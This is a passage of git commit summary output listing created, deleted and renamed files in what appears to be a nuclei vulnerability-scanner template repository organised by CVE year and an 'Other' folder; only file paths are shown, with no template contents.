100644 nuclei-templates/CVE-2022/CVE-2022-24899.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-24900.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-25306.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-25307.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-2532.yaml rename nuclei-templates/CVE-2022/{cve-2022-25323.yaml => CVE-2022-25323.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2536.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-2552.yaml rename nuclei-templates/CVE-2022/{cve-2022-26135.yaml => CVE-2022-26135.yaml} (100%) rename nuclei-templates/CVE-2022/{cve-2022-26148.yaml => CVE-2022-26148.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-26352.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-27927.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-28219.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2846.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29014.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29299.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29303.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-29464.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-29548.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-30073.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-30525.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-32022.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-32025.yaml rename nuclei-templates/CVE-2022/{cve-2022-32159.yaml => CVE-2022-32159.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-32409.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-33174.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-34046.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-34047.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-34048.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-3463.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-35416.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-3600.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-3846.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-3852.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-4120.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-45808.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-4971.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-0437.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0540.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0543.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-0870.yaml rename nuclei-templates/CVE-2022/{CVE-2022-0954.yaml => cve-2022-0921.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-0963.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-1815.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-21705.yaml rename nuclei-templates/CVE-2022/{CVE-2022-22536.yaml => cve-2022-22536.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-2290.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-22972.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-23178.yaml rename nuclei-templates/CVE-2022/{CVE-2022-23347.yaml => cve-2022-23347.yaml} (100%) rename nuclei-templates/CVE-2022/{CVE-2022-23779.yaml => cve-2022-23779.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-2486.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-2488.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-24899.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-24900.yaml rename nuclei-templates/CVE-2022/{CVE-2022-25369.yaml => cve-2022-25369.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/cve-2022-26352.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-27927.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-28219.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29014.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29299.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29303.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-29464.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-29548.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-30073.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-30525.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-32022.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-32025.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-32409.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-33174.yaml delete mode 100644 nuclei-templates/CVE-2022/cve-2022-34046.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-34047.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-34048.yaml create mode 100644 nuclei-templates/CVE-2022/cve-2022-35416.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-0058.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-0403.yaml rename nuclei-templates/{wordpress => CVE-2023}/CVE-2023-0552.yaml (79%) delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-0899.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-1282.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-1912.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-23752.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-2488.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-25194.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-3134.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-34020.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-3452.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-3836.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-40600.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-4620.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-47684.yaml delete mode 100644 nuclei-templates/CVE-2023/CVE-2023-49442.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-5307.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-5604.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-6627.yaml create mode 100644 nuclei-templates/CVE-2023/CVE-2023-7200.yaml delete mode 100644 nuclei-templates/CVE-2023/Cve-2023-23752.yaml delete mode 100644 nuclei-templates/CVE-2023/cve-2023-28432.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-0233.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-0236.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-0237.yaml delete mode 100644 nuclei-templates/CVE-2024/CVE-2024-0324.yaml delete mode 100644 nuclei-templates/CVE-2024/CVE-2024-10400.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-11303.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-1561.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-1728.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-23897.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-2879.yaml delete mode 100644 nuclei-templates/CVE-2024/CVE-2024-3495.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-43360.yaml delete mode 100644 nuclei-templates/CVE-2024/CVE-2024-4382.yaml delete mode 100644 nuclei-templates/CVE-2024/CVE-2024-5932.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8529.yaml create mode 100644 nuclei-templates/CVE-2024/CVE-2024-8859.yaml delete mode 100644 nuclei-templates/CVE-2024/CVE-2024-9156.yaml delete mode 100644 nuclei-templates/CVE-2024/cve-2024-23897.yaml rename nuclei-templates/CVE-2024/{CVE-2024-3400.yaml => cve-2024-3400.yaml} (100%) rename nuclei-templates/CVE-2024/{CVE-2024-6966.yaml => cve-2024-6966.yaml} (100%) delete mode 100644 nuclei-templates/Other/0xlfi3.yaml rename nuclei-templates/Other/{linux-lfi-fuzzing.yaml => 0xlfifuzz1.yaml} (100%) create mode 100644 nuclei-templates/Other/10026656.yaml delete mode 100644 nuclei-templates/Other/1013877238.yaml create mode 100644 nuclei-templates/Other/1017313682.yaml create mode 100644 nuclei-templates/Other/1021548475.yaml create mode 100644 nuclei-templates/Other/1037743998.yaml create mode 100644 nuclei-templates/Other/1046762834.yaml create mode 100644 nuclei-templates/Other/1046994046.yaml delete mode 100644 nuclei-templates/Other/1052768784.yaml create mode 100644 nuclei-templates/Other/1059851355.yaml create mode 100644 nuclei-templates/Other/1069194709.yaml delete mode 100644 nuclei-templates/Other/1094100874.yaml delete mode 100644 nuclei-templates/Other/1149349278.yaml delete mode 100644 nuclei-templates/Other/1160329386.yaml rename nuclei-templates/Other/{613773972.yaml => 116146157.yaml} (100%) delete mode 100644 nuclei-templates/Other/1193598862.yaml delete mode 100644 nuclei-templates/Other/1195423503.yaml delete mode 100644 nuclei-templates/Other/1198614981.yaml delete mode 100644 nuclei-templates/Other/1204339477.yaml delete mode 100644 nuclei-templates/Other/120810229.yaml rename nuclei-templates/Other/{4116145651.yaml => 1213151196.yaml} (100%) delete mode 100644 nuclei-templates/Other/1218581585.yaml create mode 100644 nuclei-templates/Other/1225742488.yaml delete mode 100644 nuclei-templates/Other/1229524994.yaml delete mode 100644 nuclei-templates/Other/123088729.yaml rename nuclei-templates/Other/{1764111933.yaml => 1264087241.yaml} (100%) create mode 100644 nuclei-templates/Other/1292911140.yaml delete mode 100644 nuclei-templates/Other/1302304737.yaml delete mode 100644 nuclei-templates/Other/1310750304.yaml create mode 100644 nuclei-templates/Other/1316215977.yaml delete mode 100644 nuclei-templates/Other/1342746263.yaml create mode 100644 nuclei-templates/Other/1350840394.yaml rename nuclei-templates/Other/{398072536.yaml => 1366049.yaml} (100%) create mode 100644 nuclei-templates/Other/1372479638.yaml create mode 100644 nuclei-templates/Other/1403212348.yaml rename nuclei-templates/Other/{167363359.yaml => 1408359568.yaml} (100%) rename nuclei-templates/Other/{1668347864.yaml => 1408482974.yaml} (100%) delete mode 100644 nuclei-templates/Other/1423025940.yaml create mode 100644 nuclei-templates/Other/1425636744.yaml delete mode 100644 nuclei-templates/Other/1427908048.yaml create mode 100644 nuclei-templates/Other/1492052638.yaml create mode 100644 nuclei-templates/Other/1496715494.yaml create mode 100644 nuclei-templates/Other/1528162206.yaml delete mode 100644 nuclei-templates/Other/1529097781.yaml create mode 100644 nuclei-templates/Other/1532218426.yaml delete mode 100644 nuclei-templates/Other/1548144737.yaml delete mode 100644 nuclei-templates/Other/1559456844.yaml create mode 100644 nuclei-templates/Other/1572265847.yaml create mode 100644 nuclei-templates/Other/1596002635.yaml create mode 100644 nuclei-templates/Other/1607116612.yaml create mode 100644 nuclei-templates/Other/161072264.yaml delete mode 100644 nuclei-templates/Other/1611875862.yaml create mode 100644 nuclei-templates/Other/1665372872.yaml create mode 100644 nuclei-templates/Other/1668989849.yaml create mode 100644 nuclei-templates/Other/1682720731.yaml create mode 100644 nuclei-templates/Other/1697450874.yaml delete mode 100644 nuclei-templates/Other/1702642724.yaml delete mode 100644 nuclei-templates/Other/1706096177.yaml create mode 100644 nuclei-templates/Other/1709769305.yaml delete mode 100644 nuclei-templates/Other/1730629258.yaml create mode 100644 nuclei-templates/Other/173132585.yaml create mode 100644 nuclei-templates/Other/1775067121.yaml create mode 100644 nuclei-templates/Other/1776522382.yaml create mode 100644 nuclei-templates/Other/1790635368.yaml create mode 100644 nuclei-templates/Other/1817448389.yaml delete mode 100644 nuclei-templates/Other/1830389600.yaml delete mode 100644 nuclei-templates/Other/1880775770.yaml delete mode 100644 nuclei-templates/Other/1891948265.yaml create mode 100644 nuclei-templates/Other/1896063946.yaml rename nuclei-templates/Other/{3072521257.yaml => 1903063314.yaml} (100%) rename nuclei-templates/Other/{4037176294.yaml => 1942392055.yaml} (100%) delete mode 100644 nuclei-templates/Other/1945636899.yaml rename nuclei-templates/Other/{3391129561.yaml => 1968322743.yaml} (100%) create mode 100644 nuclei-templates/Other/1973925380.yaml create mode 100644 nuclei-templates/Other/1976842637.yaml create mode 100644 nuclei-templates/Other/1983841135.yaml rename nuclei-templates/Other/{4245649825.yaml => 2005392177.yaml} (100%) delete mode 100644 nuclei-templates/Other/2016159038.yaml rename nuclei-templates/{CVE-2021/cve-2021-20837.yaml => Other/2021-20837.yaml} (100%) create mode 100644 nuclei-templates/Other/2022658175.yaml create mode 100644 nuclei-templates/Other/2024047501.yaml create mode 100644 nuclei-templates/Other/2039957446.yaml create mode 100644 nuclei-templates/Other/2058525765.yaml delete mode 100644 nuclei-templates/Other/206831298.yaml create mode 100644 nuclei-templates/Other/2074467663.yaml delete mode 100644 nuclei-templates/Other/2077006344.yaml create mode 100644 nuclei-templates/Other/2084392836.yaml delete mode 100644 nuclei-templates/Other/20875673.yaml delete mode 100644 nuclei-templates/Other/2095252007.yaml create mode 100644 nuclei-templates/Other/2096616170.yaml create mode 100644 nuclei-templates/Other/2137267046.yaml create mode 100644 nuclei-templates/Other/2147006267.yaml create mode 100644 nuclei-templates/Other/2183647176.yaml create mode 100644 nuclei-templates/Other/2201212761.yaml rename nuclei-templates/Other/{3228253845.yaml => 2202695844.yaml} (100%) delete mode 100644 nuclei-templates/Other/2222021882.yaml delete mode 100644 nuclei-templates/Other/2226903579.yaml delete mode 100644 nuclei-templates/Other/2251451509.yaml delete mode 100644 nuclei-templates/Other/2256172448.yaml create mode 100644 nuclei-templates/Other/2259185335.yaml create mode 100644 nuclei-templates/Other/2263718067.yaml delete mode 100644 nuclei-templates/Other/2265594678.yaml create mode 100644 nuclei-templates/Other/2303335172.yaml create mode 100644 nuclei-templates/Other/2321887670.yaml delete mode 100644 nuclei-templates/Other/2340800564.yaml create mode 100644 nuclei-templates/Other/2360475771.yaml create mode 100644 nuclei-templates/Other/2360956852.yaml rename nuclei-templates/Other/{230418335.yaml => 2364717091.yaml} (100%) delete mode 100644 nuclei-templates/Other/2389937585.yaml delete mode 100644 nuclei-templates/Other/2407258475.yaml rename nuclei-templates/Other/{2262653179.yaml => 2409959849.yaml} (100%) rename nuclei-templates/Other/{2388372590.yaml => 2424742596.yaml} (100%) create mode 100644 nuclei-templates/Other/2443314716.yaml delete mode 100644 nuclei-templates/Other/2506314282.yaml delete mode 100644 nuclei-templates/Other/2523211837.yaml create mode 100644 nuclei-templates/Other/2545972775.yaml create mode 100644 nuclei-templates/Other/2561369502.yaml delete mode 100644 nuclei-templates/Other/2561678402.yaml delete mode 100644 nuclei-templates/Other/2565774650.yaml delete mode 100644 nuclei-templates/Other/2573847404.yaml delete mode 100644 nuclei-templates/Other/2576268398.yaml create mode 100644 nuclei-templates/Other/2593130726.yaml delete mode 100644 nuclei-templates/Other/2609104929.yaml delete mode 100644 nuclei-templates/Other/2637199254.yaml rename nuclei-templates/Other/{2951003169.yaml => 2639402068.yaml} (100%) delete mode 100644 nuclei-templates/Other/2665208443.yaml delete mode 100644 nuclei-templates/Other/2667087704.yaml create mode 100644 nuclei-templates/Other/2690074150.yaml create mode 100644 nuclei-templates/Other/269469674.yaml delete mode 100644 nuclei-templates/Other/2697533097.yaml delete mode 100644 nuclei-templates/Other/2698047753.yaml create mode 100644 nuclei-templates/Other/2703184064.yaml delete mode 100644 nuclei-templates/Other/2704416492.yaml create mode 100644 nuclei-templates/Other/2726089592.yaml delete mode 100644 nuclei-templates/Other/2726646607.yaml create mode 100644 nuclei-templates/Other/2751226397.yaml create mode 100644 nuclei-templates/Other/2755030215.yaml create mode 100644 nuclei-templates/Other/2763023.yaml create mode 100644 nuclei-templates/Other/2763879923.yaml rename nuclei-templates/Other/{2972587261.yaml => 2770804765.yaml} (100%) create mode 100644 nuclei-templates/Other/2801012781.yaml delete mode 100644 nuclei-templates/Other/2817051868.yaml delete mode 100644 nuclei-templates/Other/2820248016.yaml delete mode 100644 nuclei-templates/Other/2834121884.yaml create mode 100644 nuclei-templates/Other/2846540570.yaml create mode 100644 nuclei-templates/Other/2848712183.yaml create mode 100644 nuclei-templates/Other/2866839075.yaml create mode 100644 nuclei-templates/Other/288893740.yaml delete mode 100644 nuclei-templates/Other/288961926.yaml delete mode 100644 nuclei-templates/Other/289120970.yaml delete mode 100644 nuclei-templates/Other/28948541.yaml rename nuclei-templates/Other/{stratum.yaml => 2904374066.yaml} (100%) delete mode 100644 nuclei-templates/Other/2912151193.yaml delete mode 100644 nuclei-templates/Other/29416257.yaml create mode 100644 nuclei-templates/Other/2992678216.yaml delete mode 100644 nuclei-templates/Other/3003666496.yaml delete mode 100644 nuclei-templates/Other/3118163025.yaml delete mode 100644 nuclei-templates/Other/3123870519.yaml delete mode 100644 nuclei-templates/Other/3143712891.yaml create mode 100644 nuclei-templates/Other/3154138459.yaml delete mode 100644 nuclei-templates/Other/3168049451.yaml create mode 100644 nuclei-templates/Other/3170353810.yaml rename nuclei-templates/Other/{3051375311.yaml => 3180414547.yaml} (100%) delete mode 100644 nuclei-templates/Other/3204970294.yaml create mode 100644 nuclei-templates/Other/3240204170.yaml rename nuclei-templates/Other/{990349172.yaml => 3241157799.yaml} (100%) delete mode 100644 nuclei-templates/Other/3274768380.yaml create mode 100644 nuclei-templates/Other/329618752.yaml create mode 100644 nuclei-templates/Other/330146515.yaml create mode 100644 nuclei-templates/Other/3309582589.yaml delete mode 100644 nuclei-templates/Other/3334421219.yaml delete mode 100644 nuclei-templates/Other/3341385130.yaml create mode 100644 nuclei-templates/Other/3343906575.yaml delete mode 100644 nuclei-templates/Other/335103924.yaml delete mode 100644 nuclei-templates/Other/3380049609.yaml create mode 100644 nuclei-templates/Other/3413031725.yaml create mode 100644 nuclei-templates/Other/3435460815.yaml rename nuclei-templates/Other/{90969961.yaml => 344455897.yaml} (100%) delete mode 100644 nuclei-templates/Other/3457192200.yaml create mode 100644 nuclei-templates/Other/3458805878.yaml create mode 100644 nuclei-templates/Other/3463894411.yaml delete mode 100644 nuclei-templates/Other/3473184152.yaml rename nuclei-templates/Other/{1858552467.yaml => 3477608256.yaml} (100%) delete mode 100644 nuclei-templates/Other/3483123794.yaml create mode 100644 nuclei-templates/Other/3486808021.yaml create mode 100644 nuclei-templates/Other/3489702424.yaml create mode 100644 nuclei-templates/Other/3510444022.yaml delete mode 100644 nuclei-templates/Other/3520412691.yaml delete mode 100644 nuclei-templates/Other/3524315701.yaml create mode 100644 nuclei-templates/Other/3525784120.yaml create mode 100644 nuclei-templates/Other/3525857438.yaml delete mode 100644 nuclei-templates/Other/3550102148.yaml delete mode 100644 nuclei-templates/Other/3566999691.yaml delete mode 100644 nuclei-templates/Other/3616629046.yaml create mode 100644 nuclei-templates/Other/3634568566.yaml delete mode 100644 nuclei-templates/Other/3675015956.yaml delete mode 100644 nuclei-templates/Other/3676001908.yaml delete mode 100644 nuclei-templates/Other/3686489882.yaml create mode 100644 nuclei-templates/Other/3691145095.yaml create mode 100644 nuclei-templates/Other/3694040006.yaml delete mode 100644 nuclei-templates/Other/372323483.yaml delete mode 100644 nuclei-templates/Other/3733514078.yaml rename nuclei-templates/Other/{3088220371.yaml => 3736820942.yaml} (100%) create mode 100644 nuclei-templates/Other/3742378168.yaml delete mode 100644 nuclei-templates/Other/3742541433.yaml delete mode 100644 nuclei-templates/Other/3742836546.yaml delete mode 100644 nuclei-templates/Other/3757448285.yaml create mode 100644 nuclei-templates/Other/3783141030.yaml delete mode 100644 nuclei-templates/Other/3804058600.yaml delete mode 100644 nuclei-templates/Other/3816201960.yaml create mode 100644 nuclei-templates/Other/3829723687.yaml delete mode 100644 nuclei-templates/Other/3833918288.yaml rename nuclei-templates/Other/{1237096563.yaml => 3845549602.yaml} (100%) create mode 100644 nuclei-templates/Other/3848574060.yaml delete mode 100644 nuclei-templates/Other/3850300451.yaml delete mode 100644 nuclei-templates/Other/3872460861.yaml delete mode 100644 nuclei-templates/Other/3886731892.yaml delete mode 100644 nuclei-templates/Other/3897064645.yaml create mode 100644 nuclei-templates/Other/3931284557.yaml create mode 100644 nuclei-templates/Other/3945748084.yaml create mode 100644 nuclei-templates/Other/3963267632.yaml delete mode 100644 nuclei-templates/Other/397351108.yaml delete mode 100644 nuclei-templates/Other/3976391820.yaml rename nuclei-templates/Other/{1099901347.yaml => 3994895432.yaml} (100%) rename nuclei-templates/Other/{3cx-management-console-1.yaml => 3cx-management-console.yaml} (100%) delete mode 100644 nuclei-templates/Other/3g-wireless-gateway-5.yaml create mode 100644 nuclei-templates/Other/3g-wireless-gateway.yaml rename nuclei-templates/Other/{3gmeeting-fileread.yaml => 3gmeeting-fileRead.yaml} (100%) delete mode 100644 nuclei-templates/Other/4001295490.yaml create mode 100644 nuclei-templates/Other/4010392511.yaml delete mode 100644 nuclei-templates/Other/4028446893.yaml create mode 100644 nuclei-templates/Other/4034949756.yaml delete mode 100644 nuclei-templates/Other/404669849.yaml delete mode 100644 nuclei-templates/Other/4054511659.yaml delete mode 100644 nuclei-templates/Other/4066336974.yaml delete mode 100644 nuclei-templates/Other/4067066249.yaml delete mode 100644 nuclei-templates/Other/4081216688.yaml delete mode 100644 nuclei-templates/Other/4088014974.yaml create mode 100644 nuclei-templates/Other/4103243373.yaml create mode 100644 nuclei-templates/Other/4113431364.yaml rename nuclei-templates/Other/{2339729697.yaml => 4134296145.yaml} (100%) rename nuclei-templates/Other/{1689721050.yaml => 4173490161.yaml} (100%) create mode 100644 nuclei-templates/Other/4175279379.yaml rename nuclei-templates/Other/{3864206087.yaml => 418069131.yaml} (100%) delete mode 100644 nuclei-templates/Other/418887523.yaml delete mode 100644 nuclei-templates/Other/4206215244.yaml create mode 100644 nuclei-templates/Other/44 - T9.yaml delete mode 100644 nuclei-templates/Other/454334927.yaml create mode 100644 nuclei-templates/Other/459431066.yaml delete mode 100644 nuclei-templates/Other/471799455.yaml create mode 100644 nuclei-templates/Other/472063506.yaml delete mode 100644 nuclei-templates/Other/539088528.yaml create mode 100644 nuclei-templates/Other/542224393.yaml create mode 100644 nuclei-templates/Other/545167920.yaml create mode 100644 nuclei-templates/Other/551082359.yaml create mode 100644 nuclei-templates/Other/562008096.yaml create mode 100644 nuclei-templates/Other/562603148.yaml delete mode 100644 nuclei-templates/Other/56562101.yaml delete mode 100644 nuclei-templates/Other/568669309.yaml create mode 100644 nuclei-templates/Other/582752737.yaml create mode 100644 nuclei-templates/Other/58527928.yaml rename nuclei-templates/Other/{2459657809.yaml => 616504179.yaml} (100%) rename nuclei-templates/Other/{2686182842.yaml => 649824729.yaml} (100%) create mode 100644 nuclei-templates/Other/660654583.yaml create mode 100644 nuclei-templates/Other/663188999.yaml delete mode 100644 nuclei-templates/Other/666094080.yaml create mode 100644 nuclei-templates/Other/681109274.yaml rename nuclei-templates/Other/{3512117859.yaml => 685878723.yaml} (100%) create mode 100644 nuclei-templates/Other/688202040.yaml create mode 100644 nuclei-templates/Other/731885649.yaml create mode 100644 nuclei-templates/Other/74cms-sqli-10.yaml delete mode 100644 nuclei-templates/Other/74cms-sqli-8.yaml delete mode 100644 nuclei-templates/Other/74cms-sqli.yaml create mode 100644 nuclei-templates/Other/754693119.yaml delete mode 100644 nuclei-templates/Other/793310164.yaml create mode 100644 nuclei-templates/Other/809625181.yaml delete mode 100644 nuclei-templates/Other/836277614.yaml delete mode 100644 nuclei-templates/Other/85151654.yaml create mode 100644 nuclei-templates/Other/867116384.yaml rename nuclei-templates/Other/{398541054.yaml => 881788447.yaml} (100%) create mode 100644 nuclei-templates/Other/910267215.yaml delete mode 100644 nuclei-templates/Other/944179109.yaml delete mode 100644 nuclei-templates/Other/955587354.yaml create mode 100644 nuclei-templates/Other/970930488.yaml create mode 100644 nuclei-templates/Other/974739552.yaml delete mode 100644 nuclei-templates/Other/982982602.yaml delete mode 100644 nuclei-templates/Other/988983539.yaml rename nuclei-templates/Other/{apache-ambari-weakpass.yaml => APACHE-Ambari-weakPass.yaml} (100%) delete mode 100644 nuclei-templates/Other/API-Linkfinder.yaml create mode 100644 nuclei-templates/Other/Amazon-mws-auth-token.yaml rename nuclei-templates/Other/{apereo-cas-rce.yaml => Apereo-Cas-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/CNVD-2019-06255.yaml rename nuclei-templates/Other/{cnvd-2019-19299-1051.yaml => CNVD-2019-19299.yaml} (100%) rename nuclei-templates/Other/{cnvd-2019-32204-1053.yaml => CNVD-2019-32204.yaml} (100%) rename nuclei-templates/Other/{cnvd-2020-23735-1055.yaml => CNVD-2020-23735.yaml} (100%) delete mode 100644 nuclei-templates/Other/CNVD-2020-67113.yaml rename nuclei-templates/Other/{cnvd-2020-68596-1076.yaml => CNVD-2020-68596.yaml} (100%) delete mode 100644 nuclei-templates/Other/CNVD-2021-01931.yaml rename nuclei-templates/Other/{cnvd-2021-09650-1081.yaml => CNVD-2021-09650.yaml} (100%) create mode 100644 nuclei-templates/Other/CNVD-2021-10543.yaml delete mode 100644 nuclei-templates/Other/CNVD-2022-03672.yaml create mode 100644 nuclei-templates/Other/CVE_2023_49442.yaml rename nuclei-templates/{CVE-2024/CVE-2024-10915.yaml => Other/Command Injection.yaml} (100%) rename nuclei-templates/Other/{diaowen-fileread.yaml => DIAOWEN-fileRead.yaml} (100%) rename nuclei-templates/Other/{Dahua_getUserInfoByUserName.yaml => Dahua_getFaceCapture_Sqli.yaml} (100%) delete mode 100644 "nuclei-templates/Other/E-office \344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240-mobile_upload_save\357\274\210CVE-2023-2523\357\274\211.yaml" create mode 100644 nuclei-templates/Other/GCP-service-account.yaml create mode 100644 nuclei-templates/Other/GLPI-9.3.3-SQL-Injection.yaml rename nuclei-templates/Other/{getsimple-leakage.yaml => GetSimple-leakage.yaml} (100%) create mode 100644 nuclei-templates/Other/Header-Injection.yaml create mode 100644 nuclei-templates/Other/Hikvision_applyCT_RCE.yaml rename nuclei-templates/Other/{Hikvision_iVMS-8700_Fileupload_Files.yaml => Hikvision_iVMS-8700_Fileupload_report.yaml} (100%) delete mode 100644 nuclei-templates/Other/Hikvision_iVMS-8700_upload_action.yaml rename nuclei-templates/Other/{jeesite-default-login.yaml => JeeSite-default-login.yaml} (100%) rename nuclei-templates/Other/{kingdee-file-list.yaml => Kingdee-file-list.yaml} (100%) rename nuclei-templates/Other/{kingsoft-default-login.yaml => Kingsoft-default-login.yaml} (100%) rename nuclei-templates/Other/{kingsoft-upload.yaml => Kingsoft-upload.yaml} (100%) rename nuclei-templates/Other/{magicflow-sqli.yaml => MagicFlow-sqli.yaml} (100%) rename nuclei-templates/Other/{netsurveillance-fileread.yaml => NETSurveillance-fileRead.yaml} (100%) rename nuclei-templates/Other/{Nsfocus_sas_getFile_read.yaml => Nsfocus_sas_Exec.yaml} (100%) create mode 100644 nuclei-templates/Other/Oracle-OAM-XSS.yaml delete mode 100644 nuclei-templates/Other/PHPOK-SQLi.yaml rename nuclei-templates/Other/{pictatic-api-key-9575.yaml => Pictatic-API-key.yaml} (100%) delete mode 100644 nuclei-templates/Other/RedMine-Detect.yaml create mode 100644 nuclei-templates/Other/Redmine-Default-Login.yaml rename nuclei-templates/Other/{Ruijie_EXCU_SHELL.yaml => Ruijie_NBR_Router_fileupload.yaml} (100%) create mode 100644 nuclei-templates/Other/S3Hunter.yaml delete mode 100644 nuclei-templates/Other/SpringBoot-Heapdump.yaml delete mode 100644 nuclei-templates/Other/SymfonyRCE.yaml delete mode 100644 nuclei-templates/Other/TVE-2024-105131024.yaml create mode 100644 nuclei-templates/Other/TVE-2024-105141010.yaml rename nuclei-templates/Other/{file-upload-negative.yaml => TVE-2024-105271649.yaml} (100%) rename nuclei-templates/Other/{TVE-2024-105272110.yaml => TVE-2024-105272055.yaml} (100%) create mode 100644 nuclei-templates/Other/UnAuthenticated-Tensorboard.yaml rename nuclei-templates/Other/{Wooyun-2010-080723.yaml => WOOYUN-2010-080723.yaml} (100%) rename nuclei-templates/Other/{wifisky7-rce.yaml => Wifisky-7-RCE.yaml} (100%) delete mode 100644 nuclei-templates/Other/Wireless-leakage.yaml rename nuclei-templates/Other/{X-Host.yaml => X-Host .yaml} (100%) rename nuclei-templates/Other/{X-Remote-Addr .yaml => X-Remote-Addr.yaml} (100%) rename nuclei-templates/Other/{abyss-web-server-12.yaml => abyss-web-server.yaml} (100%) rename nuclei-templates/Other/{accent-microcomputers-lfi-15.yaml => accent-microcomputers-lfi-16.yaml} (100%) rename nuclei-templates/Other/{access-log-21.yaml => access-log.yaml} (100%) create mode 100644 nuclei-templates/Other/access-logoss-disabled.yaml delete mode 100644 nuclei-templates/Other/acemanager-login-23.yaml create mode 100644 nuclei-templates/Other/acemanager-login-24.yaml rename nuclei-templates/Other/{achecker-detect-26.yaml => achecker-detect-27.yaml} (100%) create mode 100644 nuclei-templates/Other/ack-cluster-api-public.yaml create mode 100644 nuclei-templates/Other/ack-cluster-auditing-disable.yaml create mode 100644 nuclei-templates/Other/ack-cluster-cloud-monitor-disable.yaml create mode 100644 nuclei-templates/Other/ack-cluster-health-disable.yaml create mode 100644 nuclei-templates/Other/ack-cluster-network-policies-disable.yaml create mode 100644 nuclei-templates/Other/ack-cluster-network-policies-missing.yaml create mode 100644 